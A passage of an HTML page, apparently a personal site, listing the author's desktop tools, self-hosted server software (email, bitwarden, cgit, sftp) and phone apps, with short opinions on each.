<li> + <p> + <strong> + Text editor + </strong> + : + <a href="https://neovim.io/"> + nvim + </a> + . It's vim. If you don't like vim, +you should try using it longer. If you still don't like vim, you can use + <a href="https://appimage.github.io/Code_OSS/"> + code oss + </a> + which is visual studio code +but without Microsoft's creepy telemetry features. + </p> + </li> + <li> + <p> + <strong> + PDF viewer + </strong> + : + <a href="https://pwmt.org/projects/zathura/"> + zathura + </a> + . It's a pdf +viewer with vim bindings, and it works with my TeX editing setup's live +reload thingy. + </p> + </li> + <li> + <p> + <strong> + Image viewer + </strong> + : + <a href="https://github.com/muennich/sxiv"> + sxiv + </a> + . It's like zathura +but for images, but it also does a bunch of other stuff that I don't use very +often. + </p> + </li> + <li> + <p> + <strong> + Browser + </strong> + : + <a href="https://brave.com/"> + brave + </a> + . It's a normie-friendly chromium +fork with extra privacy features! I of course use brave (or any +chromium-based browser) with + <a href="https://www.tampermonkey.net/"> + tampermonkey + </a> + , + <a href="https://ublockorigin.com/"> + ublock origin + </a> + , + <a href="https://github.com/openstyles/stylus"> + stylus + </a> + and + <a href="https://darkreader.org/"> + dark +reader + </a> + . + </p> + </li> + <li> + <p> + <strong> + Terminal + </strong> + : + <a href="https://st.suckless.org/"> + st + </a> + . It's fast and simple, nothing +to complain about. I have my + <a href="https://github.com/lonkaars/st"> + own st fork + </a> + , +with a bunch of patches that make me happy. + </p> + </li> + <li> + <p> + <strong> + Password manager + </strong> + : + <a href="https://bitwarden.com/"> + bitwarden + </a> + . Open source +password manager that you can host yourself. It also has public servers which +are mostly free, but some features like time-based one-time passwords are +paid. All the clients are also open source. + </p> + </li> + <li> + <p> + <strong> + Document typesetting + </strong> + : + <a href="https://www.latex-project.org/"> + LaTeX + </a> + (using + <a href="https://personal.psu.edu/~jcc8/software/latexmk/"> + latexmk + </a> + with the + <a href="http://xetex.sourceforge.net/"> + XeTeX + </a> + compiler). + </p> + </li> + <li> + <p> + <strong> + File browser + </strong> + : + <a href="https://github.com/ranger/ranger"> + ranger + </a> + . It's kind of +slow, but I use the bulkrename feature very often, and I haven't gotten used +to the perl + <code> + rename + </code> + script yet. + </p> + </li> + <li> + <p> + <a href="https://github.com/MacPaw/XADMaster"> + unar + </a> + . I like running + <code> + unar [archive] + </code> + instead of using + <code> + 7z + </code> + , + <code> + tar + </code> + , + <code> + unzip + </code> + , etc. It creates a new folder to unpack +to automatically so it does exactly what I need. + </p> + </li> + </ul> + <h3 id="os-stuff"> + OS stuff + </h3> + <ul> + <li> + <p> + <strong> + Window manager + </strong> + : + <a href="https://github.com/Airblader/i3"> + i3-gaps + </a> + . I tried it +once and didn't switch back so this is a winner I guess. I've also heard good +things about + <a href="https://dwm.suckless.org/"> + dwm + </a> + , though I haven't used it +myself. Most people complain about i3's limited configurability, but I +haven't ran into something that it doesn't do for me. + </p> + </li> + <li> + <p> + <strong> + Application launcher + </strong> + : + <a href="https://github.com/davatorium/rofi"> + rofi + </a> + . I've +been using rofi since I started using linux, and haven't switched to anything +else because it's + <em> + very + </em> + configurable, and has a dmenu mode for using it +instead of dmenu with other scripts. I use it primarily as my application +launcher, but I also have a hotkey setup to launch + <code> + bwmenu + </code> + which is a script +that fills in bitwarden passwords using rofi. + </p> + </li> + <li> + <p> + <strong> + Shell + </strong> + : + <a href="https://www.zsh.org/"> + zsh + </a> + with + <a href="https://ohmyz.sh/"> + oh-my-zsh + </a> + . +It's zsh, all the cool kids use it already. I do have + <code> + /usr/bin/sh + </code> + <code> + ln -s + </code> + 'd +to + <code> + /usr/bin/bash + </code> + , but I'd like to change that to + <code> + /usr/bin/dash + </code> + . Eh, I'll +get around to it someday. + </p> + </li> + <li> + <p> + <strong> + Status Bar + </strong> + : + <a href="https://github.com/polybar/polybar"> + polybar + </a> + . Simple bar, +gets the job done, the configuration files make me go insane though. It took +me a good half year of ricing to understand the polybar configuration files, +and I'm still not sure if I do. + </p> + </li> + <li> + <p> + <strong> + Notification daemon + </strong> + : + <a href="https://dunst-project.org/"> + dunst + </a> + . I used to use +deadd-notification-center, but that has waaaay too many haskell dependencies +on arch, so I don't use that anymore. + </p> + </li> + <li> + <p> + <strong> + Global keybinds + </strong> + : + <a href="https://www.nongnu.org/xbindkeys/xbindkeys.html"> + xbindkeys + </a> + . Simple +configuration, works flawlessly, 10/10. + </p> + </li> + <li> + <p> + <strong> + Compositor + </strong> + : + <a href="https://github.com/yshui/picom"> + picom + </a> + . It's a simple +compositor. I use it to enable vsync for desktop windows, and I have it set +up to only show a drop shadow on floating i3 windows. + </p> + </li> + </ul> + <h3 id="closed-source"> + Closed source + </h3> + <ul> + <li> + <p> + <a href="https://discord.com/"> + discord + </a> + . Gamer. The only reason this is listed here +is because I use discord with + <a href="https://github.com/rauenzi/BetterDiscordApp"> + betterdiscord + </a> + (which + <em> + is + </em> + open-source). Betterdiscord allows you to use custom css themes, custom +plugins and a whole bunch of other cool stuff that regular discord doesn't +do. It's technically against TOS, but I don't really care as I only use +quality of life improvement plugins. + </p> + </li> + <li> + <p> + <a href="https://figma.com"> + figma + </a> + . It's the designing software that I use to create +user interface or website mockups. It's easily accessible though a browser, +and it uses webassembly so it's also decently fast. It's free for personal +use. + </p> + </li> + </ul> + <h2 id="server-software"> + Server software + </h2> + <p> + This is the software that runs on my home server. + </p> + <h3 id="email"> + Email + </h3> + <p> + I used + <a href="http://lukesmith.xyz/"> + Luke Smith's + </a> + <a href="https://github.com/LukeSmithxyz/emailwiz"> + emailwiz + </a> + to set up my email server. +The script installs and configures an email setup with + <a href="http://www.postfix.org/"> + postfix + </a> + , + <a href="https://www.dovecot.org/"> + dovecot + </a> + , + <a href="https://spamassassin.apache.org/"> + spamassassin + </a> + and + <a href="http://www.opendkim.org/"> + opendkim + </a> + . + </p> + <h3 id="etesync"> + Etesync + </h3> + <p> + I run my own + <a href="https://www.etesync.com/"> + etesync + </a> + server for synchronizing my +to-do lists, calendar and contacts. It's relatively easy to set up, and has a +web interface that you can use with your own self-hosted instance. + </p> + <h3 id="bitwarden"> + Bitwarden + </h3> + <p> + I also run my own + <a href="https://github.com/bitwarden/server"> + bitwarden + </a> + server. It +uses docker with docker-compose, which are two things that I'm supposed to know +about, but I don't. + </p> + <p> + I'm working on a connect 4 website myself, and I'm planning on learning to use +docker with docker-compose to make it easier to run the seperate parts that are +needed to host the project. + </p> + <h3 id="git"> + Git + </h3> + <p> + I have a + <a href="https://git.zx2c4.com/cgit/about/"> + cgit + </a> + server to host my git +repositories on + <a href="https://git.pipeframe.xyz"> + https://git.pipeframe.xyz + </a> + , and I use + <a href="https://gitolite.com/gitolite/"> + gitolite + </a> + for ssh git push access. Cgit is +very easy to set up, and I like it very much. Gitolite on the other hand is a +pain in the ass to set up, because the documentation is not that great. If +you're planning on using gitolite on your own server, set the umask in + <code> + ~/.gitolite.rc + </code> + of your server's git account to + <code> + 0022 + </code> + . + </p> + <h3 id="sftp"> + SFTP + </h3> + <p> + I have two semi-public sftp accounts set up on my server: + <code> + media + </code> + and + <code> + sftp + </code> + . + <code> + sftp + </code> + is for generic file sharing, and + <code> + media + </code> + is for my media. Both accounts +have tty login disabled and are chroot-jailed to /var/media and /var/sftp. + </p> + <h2 id="phone-apps"> + Phone apps + </h2> + <p> + These are the apps that I use on my phone. I have a Nokia 6 (2017), it's pretty +shitty but I don't really use my phone. I used to have it rooted, but the root +guide on xda forums was written by some Chinese guy, and it came with a Chinese +android rom, which caused me to miss a lot of calls. + </p> + <h3 id="open-source"> + Open source + </h3> + <ul> + <li> + <p> + <strong> + One-time password generator + </strong> + : + <a href="https://github.com/andOTP/andOTP"> + andotp + </a> + </p> + </li> + <li> + <p> + <strong> + App store + </strong> + : + <a href="https://gitlab.com/AuroraOSS/AuroraStore"> + aurora store + </a> + . This +app works better when you're rooted, but it's way better than the google play +store. + </p> + </li> + <li> + <p> + <strong> + App store + </strong> + : + <a href="https://gitlab.com/AuroraOSS/auroradroid"> + aurora f-droid + </a> + </p> + </li> + <li> + <p> + <strong> + Password manager + </strong> + : + <a href="https://github.com/bitwarden/mobile"> + bitwarden + </a> + </p> + </li> + <li> + <p> + <strong> + Browser + </strong> + : + <a href="https://www.bromite.org/"> + bromite + </a> + . This is basically ungoogled +chromium but for mobile. + </p> + </li> + <li> + <p> + <strong> + Calendar + </strong> + : + <a href="https://github.com/Etar-Group/Etar-Calendar"> + etar + </a> + </p> + </li> + <li> + <p> + <a href="https://github.com/etesync/android"> + etesync + </a> + </p> + </li> + <li> + <p> + <strong> + File browser + </strong> + : + <a href="https://github.com/zhanghai/MaterialFiles"> + material +files + </a> + . It looks sexy, it's free, +it's awesome. + </p> + </li> + <li> + <p> + <strong> + Email client + </strong> + : + <a href="https://email.faircode.eu/"> + fairemail + </a> + . STOP CRYING. + </p> + </li> + <li> + <p> + <strong> + Maps + </strong> + : + <a href="https://osmand.net/"> + osmand + </a> + </p> + </li> + <li> + <p> + <strong> + Music player + </strong> + : + <a href="https://www.shuttlemusicplayer.com/"> + shuttle + </a> + . It looks +sexy, it's free, it's awesome. + </p> + </li> + <li> + <p> + <strong> + Instant messenger + </strong> + : + <a href="https://signal.org/"> + signal + </a> + . + <a href="https://twitter.com/elonmusk/status/1347165127036977153"> + papa musk said +it + </a> + . + </p> + </li> + <li> + <p> + <strong> + Manga reader + </strong> + : + <a href="https://tachiyomi.org/"> + tachiyomi + </a> + </p> + </li> + <li> + <p> + <strong> + To-do lists + </strong> + : + <a href="https://tasks.org/"> + tasks.org + </a> + . This is easily the best +to-do app I've ever used, and it integrated very well with etesync. + </p> + </li> + </ul> + <h3 id="closed-source"> + Closed source + </h3> + <ul> + <li> + <strong> + Reddit client + </strong> + : + <a href="https://play.google.com/store/apps/details?id=com.laurencedawson.reddit_sync"> + sync + </a> + </li> + </ul> +</div> + + + -- cgit v1.2.3